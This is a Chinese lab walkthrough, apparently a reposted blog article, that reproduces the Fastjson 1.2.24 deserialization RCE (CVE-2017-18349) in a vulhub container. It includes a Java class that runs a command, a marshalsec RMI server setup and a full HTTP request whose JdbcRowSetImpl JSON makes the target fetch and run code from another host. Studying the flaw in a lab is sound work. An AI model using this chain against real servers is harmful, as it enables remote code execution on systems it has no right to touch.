热门标签
热门文章
- 15、canvas 渐变填充色_canvas 渐变填空
- 2lowflow-design适用于低代码或无代码开发平台的流程设计器
- 3国内20家公司大模型岗位面试经验汇总(淘天/字节/蚂蚁/商汤/美团/夸克/腾讯等)你想去的都在这_淘天 未来生活实验室
- 4ik中文分词器分词原则、原理_ik分词器原理
- 5数据结构:队列_数据结构队列
- 6SpringBoot 监控神器——Actuator 保姆级教程_springboot actuator
- 7【python】logging日志打印重复输出冗余日志_python logging重复输出
- 8利用python写一个可视化的界面
- 9mysql 9.0创建数据库_【数据库】9.0 MySQL入门学习(九)——获得数据库和表的信息、日期计算、查询、选择特殊列...
- 10Git教程(一)Git简介——廖雪峰的官方网站_git语言
当前位置: article > 正文
Fastjson 1.2.24 反序列化(CVE-2017-18349)
作者:weixin_40725706 | 2024-08-11 22:18:19
赞
踩
Fastjson 1.2.24 反序列化(CVE-2017-18349)
声明
好好学习,天天向上
漏洞描述
CVE-2017-18349,前台无回显RCE
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
影响范围
fastjson<=1.2.24
复现过程
这里使用1.2.24版本
使用vulhub
cd /app/vulhub-20201028/fastjson/1.2.24-rce
- 1
使用docker启动
docker-compose up -d
- 1
拉镜像以后,访问IP:8090
访问,可看到json格式输出
http://192.168.239.129:8090
- 1
新建一个TouchFile.java,并编译成class文件
javac TouchFile.java
- 1
文件内容
// javac TouchFile.java import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"touch", "/tmp/cve-2017-18349"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { // do nothing } } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
使用python开启站点
python -m SimpleHTTPServer 1111
192.168.239.139:1111/TouchFile.class
- 1
- 2
- 3
然后借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class:(marshalsec-0.0.3-SNAPSHOT-all.jar需要下载,编译,特别坑)
安装marshalsec,mvn也是需要安装的,不过这个很简单,和java一模一样
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
- 1
- 2
- 3
- 4
- 5
装好后运行
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.239.139:1111/#TouchFile" 9999
- 1
发送请求包
POST / HTTP/1.1 Host: 192.168.239.129:8090 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Length: 274 { "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://192.168.239.139:9999/TouchFile", "autoCommit":true } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
- 1
- 2
镜像查询(查到的第一列就是ID值)
docker ps -a
- 1
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
- 1
关闭镜像(每次用完后关闭)
docker-compose down
- 1
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/966374
推荐阅读
相关标签
